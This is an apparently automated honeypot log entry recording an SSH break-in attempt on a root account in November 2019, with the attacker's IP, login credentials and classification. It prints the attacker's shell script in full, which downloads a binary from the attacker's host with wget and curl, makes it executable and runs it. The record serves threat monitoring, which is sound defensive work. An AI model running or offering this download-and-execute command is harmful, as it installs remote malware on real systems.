Record Observations : 104.148.42.209 ssh Command execution 104.148.42.209 Z61K7XHXZMR4BTRQ


104.148.42.209 client username 'root' and password '[email protected]#[email protected]#' entered
104.148.42.209 client command : '#!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://104.148.42.209/21
curl -O http://104.148.42.209/21
chmod +x 21
./21'

Author: Honeypots.tk Robot

Time	:	29/11/2019 10:43:54
Transaction ID	:	Z61K7XHXZMR4BTRQ
Service	:	ssh
Location	:	United States
Attacker	:	104.148.42.209(209.42.148.104.in-addr.arpa)
Classification	:	Command execution

Record Observations : 104.148.42.209 ssh Command execution 104.148.42.209 Z61K7XHXZMR4BTRQ

System command execution attempt